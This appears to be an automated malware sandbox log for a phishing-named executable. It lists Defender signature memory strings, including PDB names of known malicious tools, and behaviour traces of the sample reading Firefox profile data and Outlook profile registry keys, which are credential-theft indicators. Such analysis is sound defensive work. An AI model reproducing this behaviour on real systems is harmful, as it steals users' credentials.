Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(23, 1, date('now'));
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT COUNT(1) FROM RollingQueuesValues;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: INSERT INTO SdnEx(Key, CurrentCount) VALUES (?, ?);
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(15, 1, date('now'));
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(10, 1, date('now'));
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: INSERT INTO BmProcessInfo(PPIDHash, ProcessStartTime, PID, StructVersion, ImageFileName, MonitoringFlags_Flags, MonitoringFlags_VmHardenType, MonitoringFlags_ExemptVmHardenedTypes, CommandLineArgs, HipsInjectionId, FolderGuardId, Flags, LsassReadMemId, MonitoringFlags_Flags2Low, MonitoringFlags_Flags2High)VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?);
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT Count(1) FROM BackupProcessInfo;
Source: MpSigStub.exe, 00000023.00000003.18262597335.0000015B0C754000.00000004.00000001.sdmp Binary or memory string: SELECT Key, FilePath, Context, InsertTime, ExpireTime FROM AttributePersistContext WHERE Key = ?;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT FileInstance.ID FROM FileInstance, RecordIdentifier WHERE FileInstance.RecordID = RecordIdentifier.ID AND RecordIdentifier.Key = ?;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory ORDER BY TimeStamp DESC;DELETE FROM ProcessBlockHistory WHERE ProcessPath = ? AND TimeStamp = ?;SELECT COUNT(1) FROM ProcessBlockHistory;SELECT t1.ProcessPath, t1.TimeStamp, t1.TargetPath, t1.RuleId, t1.IsAudit, t1.Action, t1.ProcessTaintReason, t1.ProcessIntegrity FROM ProcessBlockHistory AS t1 INNER JOIN(SELECT ID, ProcessPath, MAX(TimeStamp) AS MostRecentTime FROM ProcessBlockHistory WHERE RuleId = ? GROUP BY ProcessPath) AS t2 ON t1.ID = t2.ID AND t1.TimeStamp = t2.MostRecentTime ORDER BY t1.TimeStamp DESC;SELECT t1.ProcessPath, t1.TimeStamp, t1.TargetPath, t1.RuleId, t1.IsAudit, t1.Action, t1.ProcessTaintReason, t1.ProcessIntegrity FROM ProcessBlockHistory AS t1 INNER JOIN(SELECT ID, ProcessPath, MAX(TimeStamp) AS MostRecentTime FROM ProcessBlockHistory GROUP BY ProcessPath) AS t2 ON t1.ID = t2.ID AND t1.TimeStamp = t2.MostRecentTime ORDER BY t1.TimeStamp DESC;SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory WHERE RuleId = ? ORDER BY TimeStamp DESC;SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory WHERE ProcessPath = ? AND TimeStamp = ? ORDER BY TimeStamp DESC;SELECT ID FROM ProcessBlockHistory WHERE ProcessPath = ?;SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory WHERE ProcessPath = ? ORDER BY TimeStamp DESC;DELETE FROM ProcessBlockHistory WHERE TimeStamp < ?;SELECT ProcessPath, TimeStamp FROM ProcessBlockHistory ORDER BY TimeStamp ASC LIMIT 1SELECT COUNT(DISTINCT ProcessPath) FROM ProcessBlockHistory;SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory WHERE ProcessPath = ? ORDER BY TimeStamp DESC LIMIT 1;REPLACE INTO ProcessBlockHistory(ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity) VALUES (?, ?, ?, ?, ?, ?, ?, ?);DELETE FROM ProcessBlockHistory;[3
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT RecordIdentifier.Key, FileInstance.RecordID, RecordIdentifier.RecordTimeStamp, FileInstance.TrackingEnabled, FileInstance.StorageEvent, FileInstance.StorageEventState, FileInstance.ModificationsCount, FileInstance.ParentRecordID, FileInstance.Parent_FileEvent, FileInstance.Parent_FileName, RecordIdentifier.Generation, FileInstance.FileName, FileInstance.USN, FileInstance.CreateTime, FileInstance.LastAccessTime, FileInstance.LastWriteTime, FileInstance.Signer, FileInstance.SignerHash, FileInstance.Issuer, FileInstance.SigningTime, FileInstance.MOTW, FileInstance.MOTWFromParent, FileInstance.IsValidCert, FileInstance.CertInvalidDetails, FileInstance.IsCatalogSigned, File.SHA1, File.MD5, File.lshashs, File.lshash, File.PartialCRC1, File.PartialCRC2, File.PartialCRC3, File.KCRC1, File.KCRC2, File.KCRC3, File.KCRC3n, File.Size, File.SHA256, ParentProcessInfo.CommandLine, ParentProcessInfo.FileName, ParentProcessInfo.IntegrityLevel, ParentProcessInfo.ProcessId, ParentProcessInfo.StartTime, ParentProcessInfo.TokenElevation, ParentProcessInfo.TokenElevationType, RemoteProcessInfo.CommandLine, RemoteProcessInfo.FileName, RemoteProcessInfo.IntegrityLevel, RemoteProcessInfo.TokenElevation, RemoteProcessInfo.TokenElevationType, ScanInfo.NamedAttributes, ScanInfo.PeAttributes, ScanInfo.PersistSigSeq, ScanInfo.ProgenitorPersistSigSeq, ScanInfo.ScanAgent, ScanInfo.ScanReason, ScanInfo.SigAttrEvents, ScanInfo.SigSeq, ScanInfo.SigSha, ScanInfo.WebURL,Engine.EngineVersion, Engine.SigVersion FROM RecordIdentifier INNER JOIN (FileInstance INNER JOIN File ON FileInstance.FileID = File.ID LEFT OUTER JOIN ProcessInfo as 'ParentProcessInfo' ON FileInstance.Parent_ProcessID = ParentProcessInfo.ID LEFT OUTER JOIN ProcessInfo as 'RemoteProcessInfo' ON FileInstance.Remote_ProcessID = RemoteProcessInfo.ID LEFT OUTER JOIN (ScanInfo INNER JOIN Engine ON ScanInfo.EngineID = Engine.ID) ON FileInstance.ScanID = ScanInfo.ID ) ON RecordIdentifier.ID = FileInstance.RecordID WHERE RecordIdentifier.Key = ?;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: UPDATE AtomicCounters SET Name = ?, Count = ?, InsertTime = ?, ExpireTime = ?, UpdateTime = ?, WHERE Key = ?;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(9, 1, date('now'));
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT Count(1) FROM DynSigRevisions;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT COUNT(1) FROM ProcessBlockHistory;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT Count(1) FROM BmProcessInfo;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: INSERT INTO ValueMapArray(Key, RecordType, ValueMapArrayBlob, InstanceTimeStamp) VALUES(?, ? , ? , ?);
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT Key, Name, Count, InsertTime, ExpireTime FROM AttributeCounts WHERE Key = ?;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT Key, FileName, SigSeq, SigSha, SigIsSync, InstanceTimeStamp FROM FileLowFiAsync WHERE Key = ?;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT ID FROM BmFileStartupActions WHERE BmFileStartupActions.FilePathHash = ?;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT COUNT(1) FROM FileHashes;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT Key FROM FileLowFiAsync WHERE FileLowFiAsync.Key = ?;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: INSERT INTO RecordIdentifier(Key, RecordTimeStamp, Generation) VALUES(?, ?, ?);
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(27, 1, date('now'));
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: INSERT INTO FileHashes(Key, VSN, FileID, USN, InstanceTimeStamp, SHA1, MD5, SHA256, LSHASH, LSHASHS, CTPH, PartialCRC1, PartialCRC2, PartialCRC3, KCRC1, KCRC2, KCRC3, KCRC3n) VALUES(?, ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ? , ?);
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT DetectionGuid, LkgTS, NextUSN, DetectionTS, ProvisionalRemedComplTS, RemedComplTS, ImpactedCBPNameSpaces FROM RansomwareDetections WHERE Key = ?;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: INSERT INTO NetworkIpFirewallRules(Key, FirewallRuleName, ExpiryTime) VALUES (?, ?, ?);
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT FilePath, FirstStartTime, NextUSN, AutomaticRemovalPolicy, ImpactedCBPNameSpaces FROM BackupProcessInfo WHERE Key = ?;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(7, 1, date('now'));
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT Key FROM RollingQueuesTables WHERE RollingQueuesTables.Key = ?;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT InfectedFileSHA, ProcFileId, SystemFilePath, CleanFileSha FROM SystemFileCache WHERE InfectedFileSHAHash = ? OR ProcFileIDSystemFileHash = ? ORDER BY InstanceTimeStamp DESC;SELECT ID FROM SystemFileCache WHERE InfectedFileSHAHash = ? OR ProcFileIDSystemFileHash = ?;DELETE FROM SystemFileCache WHERE InstanceTimeStamp < ?; SELECT Count(1) FROM SystemFileCache WHERE CleanFileShaHash = ?; INSERT INTO SystemFileCache(InfectedFileSHAHash, InfectedFileSHA, ProcFileIDSystemFileHash, ProcFileId, SystemFilePath, CleanFileSha, CleanFileShaHash, InstanceTimeStamp) VALUES ( ?, ?, ?, ?, ?, ?, ?, ?);SELECT CleanFileSha, CleanFileShaHash FROM SystemFileCache WHERE InstanceTimeStamp < ?; SELECT Count(1) FROM SystemFileCache;DELETE FROM SystemFileCache WHERE InfectedFileSHAHash = ? OR ProcFileIDSystemFileHash = ?;2
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT Key FROM AttributePersistContext WHERE AttributePersistContext.Key = ?; DELETE FROM AttributePersistContext WHERE AttributePersistContext.Key = ?; SELECT COUNT(1) FROM AttributePersistContext; DELETE FROM AttributePersistContext WHERE ExpireTime < ?; SELECT Key FROM AttributePersistContext ORDER BY InsertTime ASC LIMIT 1; INSERT INTO AttributePersistContext(Key, FilePath, Context, InsertTime, ExpireTime) VALUES(? , ? , ? , ? , ?); UPDATE AttributePersistContext SET FilePath = ?, Context = ?, InsertTime = ?, ExpireTime = ? WHERE Key = ?;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT ProcessPath, TimeStamp, TargetPath, RuleId, IsAudit, Action, ProcessTaintReason, ProcessIntegrity FROM ProcessBlockHistory ORDER BY TimeStamp DESC;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(2, 1, date('now'));
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT Count(DISTINCT UserIdHash) FROM FolderGuardPaths;INSERT INTO FolderGuardPaths(UserIdHash, UserId, GUID, Path) VALUES ( ?, ?, ?, ? );SELECT ID FROM FolderGuardPaths WHERE UserIdHash = ? LIMIT 1;DELETE FROM FolderGuardPaths WHERE UserIdHash = ?;SELECT UserId, GUID, Path FROM FolderGuardPaths WHERE UserIdHash = ?N
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: UPDATE AttributeCounts SET Name = ?, Count = ?, InsertTime = ?, ExpireTime = ? WHERE Key = ?;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT (SELECT COUNT(*) FROM File) + (SELECT COUNT(*) FROM FileInstance);
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: INSERT INTO RollingQueuesTables(Key, Name, Capacity, TimeToLive, Mode) VALUES(? , ? , ? , ? , ?);
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: INSERT INTO FolderGuardPaths(UserIdHash, UserId, GUID, Path) VALUES ( ?, ?, ?, ? );
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT ID FROM BackupProcessInfo WHERE Key = ?;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: UPDATE SQLiteGlobals SET Current = 0 WHERE Current = 1; INSERT INTO SQLiteGlobals(Version, Current, LastUpdated) VALUES(25, 1, date('now'));
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT ID FROM BmFileInfo WHERE NormalizedPathHash = ? OR DosPathHash = ?;SELECT ID, NormalizedPathHash, DosPathHash, StructVersion, NormalizedPath, DosPath, Wow64Context, MetaContext, IsFromWeb, IsExecutable FROM BmFileInfo WHERE NormalizedPathHash = ? OR DosPathHash = ?;INSERT INTO BmFileActions(FileInfoId, ThreatRecordId, Action) VALUES (?, ?, ?);INSERT INTO BmFileInfo(NormalizedPathHash, DosPathHash, StructVersion, NormalizedPath, DosPath, Wow64Context, MetaContext, IsFromWeb, IsExecutable) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?);DELETE FROM BmFileInfo WHERE NormalizedPathHash = ? OR DosPathHash = ?;SELECT Count(1) FROM BmFileInfo;SELECT ThreatRecordId, Action FROM BmFileActions WHERE FileInfoId == ?;DELETE FROM BmFileActions;DELETE FROM BmFileInfo;B
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT Count(1) FROM BmFileStartupActions;
Source: MpSigStub.exe, 00000023.00000003.18262597335.0000015B0C754000.00000004.00000001.sdmp Binary or memory string: UPDATE AttributePersistContext SET FilePath = ?, Context = ?, InsertTime = ?, ExpireTime = ? WHERE Key = ?; INSERT INTO AttributePersistContext(Key, FilePath, Context, InsertTime, ExpireTime) VALUES(? , ? , ? , ? , ?); SELECT Key FROM AttributePersistContext ORDER BY InsertTime ASC LIMIT 1; SELECT Key, FilePath, Context, InsertTime, ExpireTime FROM AttributePersistContext WHERE Key = ?; SELECT COUNT(1) FROM AttributePersistContext; DELETE FROM AttributePersistContext WHERE AttributePersistContext.Key = ?; SELECT Key FROM AttributePersistContext WHERE AttributePersistContext.Key = ?; DELETE FROM AttributePersistContext WHERE ExpireTime < ?;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: SELECT Key FROM AttributePersistContext ORDER BY InsertTime ASC LIMIT 1;
Source: MpSigStub.exe, 00000023.00000003.18245056044.0000015B0B6EB000.00000004.00000001.sdmp Binary or memory string: INSERT INTO Engine(EngineVersion, SigVersion) VALUES(? , ? );
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Code function: 42_2_00007FF650CFB1C4 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,GetLastError,Process32FirstW,GetLastError,Process32NextW,GetLastError,FindCloseChangeNotification,CloseHandle, 42_2_00007FF650CFB1C4
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:5224:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1260:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:7116:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1260:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7776:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:7116:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6788:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6788:304:WilStaging_02
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7776:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \BaseNamedObjects\Local\SM0:5224:304:WilStaging_02
Source: Foreign_Bank Account Details.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Section loaded: C:\Windows\SysWOW64\msvbvm60.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File created: C:\Users\user\AppData\Roaming\tKZVPq Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Code function: 42_2_00007FF650CEB0C8 OpenSCManagerW,OpenServiceW,CloseServiceHandle,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle, 42_2_00007FF650CEB0C8
Source: Foreign_Bank Account Details.exe ReversingLabs: Detection: 33%
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-c45e5da5.exe File created: C:\Windows\SERVIC~1\NETWOR~1\AppData\Local\Temp\24D82C9E-A161-4073-AC5C-CF18E1F4A1E0 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: Binary string: \Release\runner.pdb source: MpSigStub.exe, 00000023.00000003.18327176542.0000015B1B61C000.00000004.00000001.sdmp
Source: Binary string: ASAM\original\delfiletype\delfiletype\obj\Release\delfiletype.pdb source: MpSigStub.exe, 00000023.00000003.18428156417.0000015B1C02A000.00000004.00000001.sdmp
Source: Binary string: Release\arc_2010.pdb source: MpSigStub.exe, 00000023.00000003.18434111043.0000015B1AF23000.00000004.00000001.sdmp
Source: Binary string: oyvmhvtgei\bmjc\fee.pdb source: MpSigStub.exe, 00000023.00000003.18427547415.0000015B1B8F2000.00000004.00000001.sdmp
Source: Binary string: \fcrypt\Release\S\s_high.pdb source: MpSigStub.exe, 00000023.00000003.18300585182.0000015B1A681000.00000004.00000001.sdmp
Source: Binary string: \natchat-master\x64\Release\natchat.pdb source: MpSigStub.exe, 00000023.00000003.18297596094.0000015B1B44F000.00000004.00000001.sdmp
Source: Binary string: c:\1\rich\look\80\24\Famous\35\72\special\22\melody.pdb source: MpSigStub.exe, 00000023.00000003.18297596094.0000015B1B44F000.00000004.00000001.sdmp
Source: Binary string: main\payload\payload.x86.pdb source: MpSigStub.exe, 00000023.00000003.18430797596.0000015B1AE5D000.00000004.00000001.sdmp
Source: Binary string: CFy92ROzKls\ro\HwtAF.pdb source: MpSigStub.exe, 00000023.00000003.18428517155.0000015B1C06B000.00000004.00000001.sdmp
Source: Binary string: -:\MySpys\chrome_cookie_view\Release\crome.pdb source: MpSigStub.exe, 00000023.00000003.18343611807.0000015B1BD13000.00000004.00000001.sdmp
Source: Binary string: cts\AKL\kh\Release\kh.pdb source: MpSigStub.exe, 00000023.00000003.18322243559.0000015B1A504000.00000004.00000001.sdmp
Source: Binary string: *.pdb.|!\binplace.exe source: MpSigStub.exe, 00000023.00000003.18295774211.0000015B1BEE1000.00000004.00000001.sdmp
Source: Binary string: .C:\SlackDismort\third\Release\SlackDismort.pdbat source: MpSigStub.exe, 00000023.00000003.18333278800.0000015B1AC5E000.00000004.00000001.sdmp
Source: Binary string: C:\Proyectos\desktop_apps\Updater\UpdaterVittalia\obj\Release\UpdaterService.pdbxx source: MpSigStub.exe, 00000023.00000003.18314163408.0000015B1BB45000.00000004.00000001.sdmp
Source: Binary string: dciman32.pdb source: MpSigStub.exe, 00000023.00000003.18298177384.0000015B1AD15000.00000004.00000001.sdmp
Source: Binary string: \BeamWinHTTP\Release\BeamWinHTTP.pdb source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp
Source: Binary string: msmdsrv.pdb source: MpSigStub.exe, 00000023.00000003.18323230598.0000015B1B134000.00000004.00000001.sdmp
Source: Binary string: Release\NexGenMediaPlayerApp.pdb source: MpSigStub.exe, 00000023.00000003.18293045113.0000015B1BC4D000.00000004.00000001.sdmp
Source: Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\mshta\objfre\i386\mshta.pdb source: MpSigStub.exe, 00000023.00000003.18313187984.0000015B1B305000.00000004.00000001.sdmp
Source: Binary string: he#@1.Pdb source: MpSigStub.exe, 00000023.00000003.18428865493.0000015B1A381000.00000004.00000001.sdmp
Source: Binary string: heerhWHW#@1wHJnERbRW.Pdb source: MpSigStub.exe, 00000023.00000003.18428865493.0000015B1A381000.00000004.00000001.sdmp
Source: Binary string: LMIGuardianSvc.pdb source: MpSigStub.exe, 00000023.00000003.18319967809.0000015B1BE5C000.00000004.00000001.sdmp
Source: Binary string: \Release\gogodele.pdb source: MpSigStub.exe, 00000023.00000003.18424133495.0000015B1C0F0000.00000004.00000001.sdmp
Source: Binary string: +020202020202020202020202020202020202020.pdb source: MpSigStub.exe, 00000023.00000003.18307169245.0000015B1A4C3000.00000004.00000001.sdmp
Source: Binary string: \\Desktop\\.+\.pdb source: MpSigStub.exe, 00000023.00000003.18296662261.0000015B1C292000.00000004.00000001.sdmp
Source: Binary string: N%Tray Me !.*\\Release\\Tray Me !\.pdb source: MpSigStub.exe, 00000023.00000003.18296662261.0000015B1C292000.00000004.00000001.sdmp
Source: Binary string: SpeedNewASK\Debug\spdfrmon.pdb source: MpSigStub.exe, 00000023.00000003.18424989390.0000015B1C5AA000.00000004.00000001.sdmp
Source: Binary string: 0\Adobe Reader.pdb source: MpSigStub.exe, 00000023.00000003.18427196191.0000015B1AB46000.00000004.00000001.sdmp
Source: Binary string: fastfat.pdbN source: MpSigStub.exe, 00000023.00000003.18338690411.0000015B1A7CB000.00000004.00000001.sdmp
Source: Binary string: \release\LSASecretsDump.pdb source: MpSigStub.exe, 00000023.00000003.18291256000.0000015B1B9B9000.00000004.00000001.sdmp
Source: Binary string: wl-cmd\Release\dll1.pdb source: MpSigStub.exe, 00000023.00000003.18429740183.0000015B1B2C1000.00000004.00000001.sdmp
Source: Binary string: PD:\projects\new_Clicker\SIV\original\daemon\NewClieckerDll\Release\SIVUpdate.pdb] source: MpSigStub.exe, 00000023.00000003.18318994950.0000015B1A589000.00000004.00000001.sdmp
Source: Binary string: sctasks.pdbd source: MpSigStub.exe, 00000023.00000003.18289945062.0000015B1AE5F000.00000004.00000001.sdmp
Source: Binary string: \i386\iSafeKrnlR3.pdb source: MpSigStub.exe, 00000023.00000003.18305343223.0000015B1C4E5000.00000004.00000001.sdmp
Source: Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\find\objfre\i386\find.pdb source: MpSigStub.exe, 00000023.00000003.18315964598.0000015B1A481000.00000004.00000001.sdmp
Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: MpSigStub.exe, 00000023.00000003.18282376211.0000015B1C133000.00000004.00000001.sdmp
Source: Binary string: ZUsers\Admin\Documents\Visual Studio 2015\Projects\Cryptor2.0 Simple\Release\Cryptor2.0.pdba source: MpSigStub.exe, 00000023.00000003.18335134155.0000015B1A914000.00000004.00000001.sdmp
Source: Binary string: \WinCbt\Release\WinCbt.pdb source: MpSigStub.exe, 00000023.00000003.18318994950.0000015B1A589000.00000004.00000001.sdmp
Source: Binary string: @C:\Users\AverageGoose\source\repos\GooseLab\Release\GooseLab.pdb source: MpSigStub.exe, 00000023.00000003.18321417418.0000015B1B6C0000.00000004.00000001.sdmp
Source: Binary string: usp10.pdb source: MpSigStub.exe, 00000023.00000003.18289622866.0000015B1BD96000.00000004.00000001.sdmp
Source: Binary string: :b.ProgramISLNetworkStart_win32.0\Release\launch_normal.pdb source: MpSigStub.exe, 00000023.00000003.18333278800.0000015B1AC5E000.00000004.00000001.sdmp
Source: Binary string: g711codc.pdb3 source: MpSigStub.exe, 00000023.00000003.18338690411.0000015B1A7CB000.00000004.00000001.sdmp
Source: Binary string: Ransomware.pdbxN source: MpSigStub.exe, 00000023.00000003.18432465628.0000015B1B9FA000.00000004.00000001.sdmp
Source: Binary string: reg.pdb source: MpSigStub.exe, 00000023.00000003.18306868118.0000015B1AA1D000.00000004.00000001.sdmp
Source: Binary string: -GMGameStart\bin\release_static\GMUnPacker.pdba source: MpSigStub.exe, 00000023.00000003.18321417418.0000015B1B6C0000.00000004.00000001.sdmp
Source: Binary string: \SearchProtect\Bin\Release\ProtectService.pdb source: MpSigStub.exe, 00000023.00000003.18349339011.0000015B1A999000.00000004.00000001.sdmp
